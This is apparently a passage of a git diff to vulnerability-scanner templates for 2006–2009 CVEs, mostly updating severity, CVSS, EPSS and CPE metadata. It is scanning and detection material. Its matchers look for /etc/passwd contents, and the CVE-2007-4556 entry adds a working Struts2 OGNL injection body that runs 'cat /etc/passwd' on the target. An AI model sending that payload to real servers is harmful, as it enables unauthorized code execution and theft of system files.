http://squirrelmail.cvs.sourceforge.net/squirrelmail/squirrelmail/functions/global.php?r1=1.27.2.16&r2=1.27.2.17&view=patch&pathrev=SM-1_4-STABLE - http://www.squirrelmail.org/security/issue/2006-06-01 - - http://web.archive.org/web/20160915101900/http://secunia.com/advisories/20406/ - https://nvd.nist.gov/vuln/detail/CVE-2006-2842 + - ftp://patches.sgi.com/support/free/security/advisories/20060703-01-U.asc classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2006-2842 cwe-id: CWE-22 - tags: cve,cve2006,lfi,squirrelmail,edb + epss-score: 0.2925 + cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: squirrelmail + product: squirrelmail + tags: cve,cve2006,lfi,squirrelmail,edb http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/cves/2007/CVE-2007-0885.yaml b/http/cves/2007/CVE-2007-0885.yaml index 37078a7418..646e83cddf 100644 --- a/http/cves/2007/CVE-2007-0885.yaml +++ b/http/cves/2007/CVE-2007-0885.yaml @@ -6,18 +6,20 @@ info: severity: medium description: Jira Rainbow.Zen contains a cross-site scripting vulnerability via Jira/secure/BrowseProject.jspa which allows remote attackers to inject arbitrary web script or HTML via the id parameter. reference: - - http://web.archive.org/web/20201208220614/https://www.securityfocus.com/archive/1/459590/100/0/threaded - - https://web.archive.org/web/20210119080228/http://www.securityfocus.com/bid/22503 - https://exchange.xforce.ibmcloud.com/vulnerabilities/32418 - https://nvd.nist.gov/vuln/detail/CVE-2007-0885 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P + cvss-score: 6.8 cve-id: CVE-2007-0885 cwe-id: NVD-CWE-Other - cvss-score: 6.8 - tags: cve,cve2007,jira,xss + epss-score: 0.00694 + cpe: cpe:2.3:a:rainbow_portal:rainbow.zen:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: rainbow_portal + product: rainbow.zen + tags: cve,cve2007,jira,xss http: - method: GET @@ -30,11 +32,11 @@ http: words: - '">' - - type: status - status: - - 200 - - type: word part: header words: - "text/html" + + - type: status + status: + - 200 diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index 9ec9e40713..55d094a781 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml @@ -3,20 +3,24 @@ id: CVE-2007-4504 info: name: Joomla! RSfiles <=1.0.2 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action. reference: - https://www.exploit-db.com/exploits/4307 - https://exchange.xforce.ibmcloud.com/vulnerabilities/36222 - https://nvd.nist.gov/vuln/detail/CVE-2007-4504 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2007-4504 cwe-id: CWE-22 - tags: lfi,edb,cve,cve2007,joomla + epss-score: 0.01677 + cpe: cpe:2.3:a:joomla:rsfiles:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla + product: rsfiles + tags: lfi,edb,cve,cve2007,joomla http: - method: GET @@ -25,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml index 31e15e5651..277a1a6504 100644 --- a/http/cves/2007/CVE-2007-4556.yaml +++ b/http/cves/2007/CVE-2007-4556.yaml @@ -3,7 +3,7 @@ id: CVE-2007-4556 info: name: OpenSymphony XWork/Apache Struts2 - Remote Code Execution author: pikpikcu - severity: critical + severity: medium description: | Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character. reference: @@ -11,31 +11,37 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2007-4556 - https://cwiki.apache.org/confluence/display/WW/S2-001 - http://forums.opensymphony.com/ann.jspa?annID=54 + - http://issues.apache.org/struts/browse/WW-2030 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2007-4556 cwe-id: NVD-CWE-Other - tags: cve,cve2007,apache,rce,struts + epss-score: 0.14147 + cpe: cpe:2.3:a:opensymphony:xwork:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: opensymphony + product: xwork + tags: cve,cve2007,apache,rce,struts http: - method: POST path: - "{{BaseURL}}/login.action" - headers: - Content-Type: application/x-www-form-urlencoded + body: | username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D + headers: + Content-Type: application/x-www-form-urlencoded + matchers-condition: and matchers: - - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index 1ca72229dc..b83512040f 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -8,17 +8,21 @@ info: reference: - https://www.exploit-db.com/exploits/30090 - http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063617.html - - http://web.archive.org/web/20210130131735/https://www.securityfocus.com/bid/24182/ - - http://web.archive.org/web/20161220160642/http://secunia.com/advisories/25446/ - https://nvd.nist.gov/vuln/detail/CVE-2007-5728 + - http://www.debian.org/security/2008/dsa-1693 + - http://www.novell.com/linux/security/advisories/2007_24_sr.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2007-5728 cwe-id: CWE-79 + epss-score: 0.03308 + cpe: cpe:2.3:a:phppgadmin:phppgadmin:3.5:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"phpPgAdmin" + vendor: phppgadmin + product: phppgadmin tags: cve,cve2007,xss,pgadmin,phppgadmin,edb http: @@ -28,16 +32,15 @@ http: matchers-condition: and matchers: - - type: word words: - '' - - type: status - status: - - 200 - - type: word part: header words: - "text/html" + + - type: status + status: + - 200 diff --git a/http/cves/2008/CVE-2008-1059.yaml b/http/cves/2008/CVE-2008-1059.yaml index ca6101e405..c1db177cb9 100644 --- a/http/cves/2008/CVE-2008-1059.yaml +++ b/http/cves/2008/CVE-2008-1059.yaml @@ -10,15 +10,20 @@ info: - https://www.exploit-db.com/exploits/5194 - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881 - https://nvd.nist.gov/vuln/detail/CVE-2008-1059 - - https://web.archive.org/web/20090615225856/http://secunia.com/advisories/29099/ + - http://securityreason.com/securityalert/3706 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/40829 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2008-1059 - cwe-id: CWE-79 - tags: lfi,cve,cve2008,wordpress,wp-plugin,wp,sniplets,edb,wpscan + cwe-id: CWE-94 + epss-score: 0.01493 + cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: wordpress + product: sniplets_plugin + tags: lfi,cve,cve2008,wordpress,wp-plugin,wp,sniplets,edb,wpscan http: - method: GET diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index 38db66918d..9778fb65f2 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -3,7 +3,7 @@ id: CVE-2008-1061 info: name: WordPress Sniplets <=1.2.2 - Cross-Site Scripting author: dhiyaneshDK - severity: high + severity: medium description: | WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php. reference: @@ -11,14 +11,19 @@ info: - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881 - https://nvd.nist.gov/vuln/detail/CVE-2008-1061 - http://securityreason.com/securityalert/3706 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/40830 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2008-1061 cwe-id: CWE-79 - tags: xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets + epss-score: 0.00938 + cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: wordpress + product: sniplets_plugin + tags: xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets http: - method: GET diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml index bc9e0ebac4..e290bc9c53 100644 --- a/http/cves/2008/CVE-2008-1547.yaml +++ b/http/cves/2008/CVE-2008-1547.yaml @@ -9,16 +9,20 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2008-1547 - https://www.exploit-db.com/exploits/32489 - - https://www.securityfocus.com/bid/31765/info + - http://securityreason.com/securityalert/4441 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/46061 classification: - cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2008-1547 cwe-id: CWE-601 + epss-score: 0.03523 cpe: cpe:2.3:a:microsoft:exchange_server:2003:sp2:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.title:"Outlook" + vendor: microsoft + product: exchange_server tags: cve,cve2008,redirect,owa,exchange,microsoft http: diff --git a/http/cves/2008/CVE-2008-2398.yaml b/http/cves/2008/CVE-2008-2398.yaml index f9518c8659..b214ef291f 100644 --- a/http/cves/2008/CVE-2008-2398.yaml +++ b/http/cves/2008/CVE-2008-2398.yaml @@ -7,18 +7,20 @@ info: description: AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter. reference: - https://exchange.xforce.ibmcloud.com/vulnerabilities/42546 - - http://web.archive.org/web/20210121181851/https://www.securityfocus.com/bid/29291/ - - http://web.archive.org/web/20140724110348/http://secunia.com/advisories/30333/ - http://securityreason.com/securityalert/3896 - https://nvd.nist.gov/vuln/detail/CVE-2008-2398 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2008-2398 cwe-id: CWE-79 - cvss-score: 4.3 - tags: cve,cve2008,xss + epss-score: 0.00329 + cpe: cpe:2.3:a:appserv_open_project:appserv:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: appserv_open_project + product: appserv + tags: cve,cve2008,xss http: - method: GET @@ -27,15 +29,16 @@ http: matchers-condition: and matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 - - type: word - words: - - "" - part: body - - - type: word - words: - - "text/html" - part: header diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml index b236309e78..22c20eea92 100644 --- a/http/cves/2008/CVE-2008-2650.yaml +++ b/http/cves/2008/CVE-2008-2650.yaml @@ -3,22 +3,27 @@ id: CVE-2008-2650 info: name: CMSimple 3.1 - Local File Inclusion author: pussycat0x - severity: high + severity: medium description: | CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number. reference: - http://www.cmsimple.com/forum/viewtopic.php?f=2&t=17 - - http://web.archive.org/web/20210121182016/https://www.securityfocus.com/bid/29450/ - http://web.archive.org/web/20140729144732/http://secunia.com:80/advisories/30463 - https://nvd.nist.gov/vuln/detail/CVE-2008-2650 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/42792 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/42793 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P + cvss-score: 6.8 cve-id: CVE-2008-2650 cwe-id: CWE-22 - tags: cve,cve2008,lfi,cmsimple + epss-score: 0.06344 + cpe: cpe:2.3:a:cmsimple:cmsimple:3.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cmsimple + product: cmsimple + tags: cve,cve2008,lfi,cmsimple http: - raw: @@ -29,7 +34,6 @@ http: matchers-condition: and matchers: - - type: regex part: body regex: diff --git a/http/cves/2008/CVE-2008-4668.yaml b/http/cves/2008/CVE-2008-4668.yaml index 40c1a5e8e4..1a768681fa 100644 --- a/http/cves/2008/CVE-2008-4668.yaml +++ b/http/cves/2008/CVE-2008-4668.yaml @@ -3,21 +3,25 @@ id: CVE-2008-4668 info: name: Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion author: daffainfo - severity: high + severity: critical description: Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php. reference: - https://www.exploit-db.com/exploits/6618 - - http://web.archive.org/web/20210121183742/https://www.securityfocus.com/bid/31458/ - http://securityreason.com/securityalert/4464 - https://nvd.nist.gov/vuln/detail/CVE-2008-4668 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/45490 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:P/A:P cvss-score: 9 cve-id: CVE-2008-4668 cwe-id: CWE-22 - tags: cve,cve2008,joomla,lfi,edb + epss-score: 0.01018 + cpe: cpe:2.3:a:joomla:com_imagebrowser:0.1.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla + product: com_imagebrowser + tags: cve,cve2008,joomla,lfi,edb http: - method: GET @@ -26,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2008/CVE-2008-4764.yaml b/http/cves/2008/CVE-2008-4764.yaml index 94fcea035c..fc77b5f39e 100644 --- a/http/cves/2008/CVE-2008-4764.yaml +++ b/http/cves/2008/CVE-2008-4764.yaml @@ -3,21 +3,24 @@ id: CVE-2008-4764 info: name: Joomla! <=2.0.0 RC2 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: Joomla! 2.0.0 RC2 and earlier are susceptible to local file inclusion in the eXtplorer module (com_extplorer) that allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action. reference: - https://www.exploit-db.com/exploits/5435 - - http://web.archive.org/web/20210121181347/https://www.securityfocus.com/bid/28764/ - https://exchange.xforce.ibmcloud.com/vulnerabilities/41873 - https://nvd.nist.gov/vuln/detail/CVE-2008-4764 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2008-4764 cwe-id: CWE-22 - tags: edb,cve,cve2008,joomla,lfi + epss-score: 0.00779 + cpe: cpe:2.3:a:extplorer:com_extplorer:*:rc2:*:*:*:*:*:* metadata: max-request: 1 + vendor: extplorer + product: com_extplorer + tags: edb,cve,cve2008,joomla,lfi http: - method: GET @@ -26,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index 4a67130c8a..8d2bbdc149 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml @@ -7,18 +7,22 @@ info: description: phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register globals is enabled. Remote attackers can read arbitrary files via a .. (dot dot) in the _language parameter to index.php. reference: - https://www.exploit-db.com/exploits/7363 - - http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/ - - http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014 - - http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263 - https://nvd.nist.gov/vuln/detail/CVE-2008-5587 + - http://lists.opensuse.org/opensuse-security-announce/2009-02/msg00002.html + - http://lists.opensuse.org/opensuse-updates/2012-04/msg00033.html + - http://securityreason.com/securityalert/4737 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N cvss-score: 4.3 cve-id: CVE-2008-5587 cwe-id: CWE-22 + epss-score: 0.02331 + cpe: cpe:2.3:a:phppgadmin:phppgadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"phpPgAdmin" + vendor: phppgadmin + product: phppgadmin tags: cve,cve2008,lfi,phppgadmin,edb http: @@ -28,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml index 81e9ea2ee5..16ef73ee8d 100644 --- a/http/cves/2008/CVE-2008-6080.yaml +++ b/http/cves/2008/CVE-2008-6080.yaml @@ -3,21 +3,24 @@ id: CVE-2008-6080 info: name: Joomla! ionFiles 4.4.2 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. reference: - https://www.exploit-db.com/exploits/6809 - - http://web.archive.org/web/20140804231654/http://secunia.com/advisories/32377/ - - http://web.archive.org/web/20210121184101/https://www.securityfocus.com/bid/31877/ - https://nvd.nist.gov/vuln/detail/CVE-2008-6080 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/46039 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2008-6080 cwe-id: CWE-22 - tags: edb,cve,cve2008,joomla,lfi + epss-score: 0.00548 + cpe: cpe:2.3:a:codecall:com_ionfiles:4.4.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: codecall + product: com_ionfiles + tags: edb,cve,cve2008,joomla,lfi http: - method: GET @@ -26,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index a1f5eda655..296a03faed 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml @@ -3,21 +3,24 @@ id: CVE-2008-6172 info: name: Joomla! Component RWCards 3.0.11 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter. reference: - https://www.exploit-db.com/exploits/6817 - https://nvd.nist.gov/vuln/detail/CVE-2008-6172 - - http://web.archive.org/web/20140804232841/http://secunia.com/advisories/32367/ - - http://web.archive.org/web/20210121184108/https://www.securityfocus.com/bid/31892/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/46081 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2008-6172 cwe-id: CWE-22 - tags: cve2008,joomla,lfi,edb,cve + epss-score: 0.00367 + cpe: cpe:2.3:a:weberr:rwcards:3.0.11:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: weberr + product: rwcards + tags: cve2008,joomla,lfi,edb,cve http: - method: GET @@ -26,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml index 68b4919f05..65cc03071a 100644 --- a/http/cves/2008/CVE-2008-6222.yaml +++ b/http/cves/2008/CVE-2008-6222.yaml @@ -3,21 +3,24 @@ id: CVE-2008-6222 info: name: Joomla! ProDesk 1.0/1.2 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php. reference: - https://www.exploit-db.com/exploits/6980 - - http://web.archive.org/web/20111223225601/http://secunia.com/advisories/32523/ - - http://web.archive.org/web/20210121184244/https://www.securityfocus.com/bid/32113/ - https://nvd.nist.gov/vuln/detail/CVE-2008-6222 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/46356 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2008-6222 cwe-id: CWE-22 - tags: cve2008,joomla,lfi,edb,cve + epss-score: 0.00684 + cpe: cpe:2.3:a:joomlashowroom:pro_desk_support_center:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlashowroom + product: pro_desk_support_center + tags: cve2008,joomla,lfi,edb,cve http: - method: GET @@ -26,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index da9a1824d7..defd3ee5c7 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml @@ -12,14 +12,18 @@ info: - https://exchange.xforce.ibmcloud.com/vulnerabilities/45252 - https://nvd.nist.gov/vuln/detail/CVE-2008-6465 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2008-6465 - cwe-id: CWE-80 + cwe-id: CWE-79 + epss-score: 0.00421 + cpe: cpe:2.3:a:parallels:h-sphere:3.0.0:p9:*:*:*:*:*:* metadata: max-request: 1 verified: true shodan-query: title:"Parallels H-Sphere + vendor: parallels + product: h-sphere tags: cve,cve2008,xss,parallels,h-sphere http: diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index 15d13e5608..6015b4e93e 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -3,21 +3,25 @@ id: CVE-2008-6668 info: name: nweb2fax <=0.2.7 - Local File Inclusion author: geeknik - severity: high + severity: medium description: nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php. reference: - https://www.exploit-db.com/exploits/5856 - - http://web.archive.org/web/20210130035550/https://www.securityfocus.com/bid/29804 - https://exchange.xforce.ibmcloud.com/vulnerabilities/43173 - https://nvd.nist.gov/vuln/detail/CVE-2008-6668 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/43172 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2008-6668 cwe-id: CWE-22 - tags: cve2008,nweb2fax,lfi,traversal,edb,cve + epss-score: 0.00359 + cpe: cpe:2.3:a:dirk_bartley:nweb2fax:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: dirk_bartley + product: nweb2fax + tags: cve2008,nweb2fax,lfi,traversal,edb,cve http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex part: body regex: diff --git a/http/cves/2008/CVE-2008-6982.yaml b/http/cves/2008/CVE-2008-6982.yaml index 7939deffd8..e7c725f794 100644 --- a/http/cves/2008/CVE-2008-6982.yaml +++ b/http/cves/2008/CVE-2008-6982.yaml @@ -3,21 +3,26 @@ id: CVE-2008-6982 info: name: Devalcms 1.4a - Cross-Site Scripting author: arafatansari - severity: high + severity: medium description: | Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file. reference: - https://www.exploit-db.com/exploits/6369 - http://sourceforge.net/projects/devalcms/files/devalcms/devalcms-1.4b/devalcms-1.4b.zip/download - https://nvd.nist.gov/vuln/detail/CVE-2008-6982 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/44940 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2008-6982 cwe-id: CWE-79 + epss-score: 0.0038 + cpe: cpe:2.3:a:devalcms:devalcms:1.4a:*:*:*:*:*:*:* metadata: max-request: 1 verified: true + vendor: devalcms + product: devalcms tags: cve,cve2008,devalcms,xss,cms,edb http: diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml index 4b111acfa6..2a8fc8c9c3 100644 --- a/http/cves/2008/CVE-2008-7269.yaml +++ b/http/cves/2008/CVE-2008-7269.yaml @@ -10,15 +10,18 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2008-7269 - https://www.exploit-db.com/exploits/6823 classification: - cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:P + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:P cvss-score: 5.8 cve-id: CVE-2008-7269 cwe-id: CWE-20 + epss-score: 0.03645 cpe: cpe:2.3:a:boka:siteengine:5.0:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: html:"SiteEngine" verified: "true" + vendor: boka + product: siteengine tags: cve,cve2008,redirect,siteengine http: diff --git a/http/cves/2009/CVE-2009-0347.yaml b/http/cves/2009/CVE-2009-0347.yaml index a22afd3e5f..dfce9670b5 100644 --- a/http/cves/2009/CVE-2009-0347.yaml +++ b/http/cves/2009/CVE-2009-0347.yaml @@ -11,14 +11,18 @@ info: - https://www.exploit-db.com/exploits/32766 - https://www.kb.cert.org/vuls/id/202753 - https://exchange.xforce.ibmcloud.com/vulnerabilities/48336 + - http://sunbeltblog.blogspot.com/2009/01/constant-stream-of-ultraseek-redirects.html classification: - cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:P + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:P cvss-score: 5.8 cve-id: CVE-2009-0347 cwe-id: CWE-59 + epss-score: 0.08272 cpe: cpe:2.3:a:autonomy:ultraseek:_nil_:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: autonomy + product: ultraseek tags: cve,cve2009,redirect,autonomy http: diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml index 277a638723..ba3b74a6ea 100644 --- a/http/cves/2009/CVE-2009-0545.yaml +++ b/http/cves/2009/CVE-2009-0545.yaml @@ -10,14 +10,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2009-0545 - http://www.zeroshell.net/eng/announcements/ - http://www.ikkisoft.com/stuff/LC-2009-01.txt + - http://www.vupen.com/english/advisories/2009/0385 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C cvss-score: 10 cve-id: CVE-2009-0545 cwe-id: CWE-20 - tags: edb,cve,cve2009,zeroshell,kerbynet,rce + epss-score: 0.9719 + cpe: 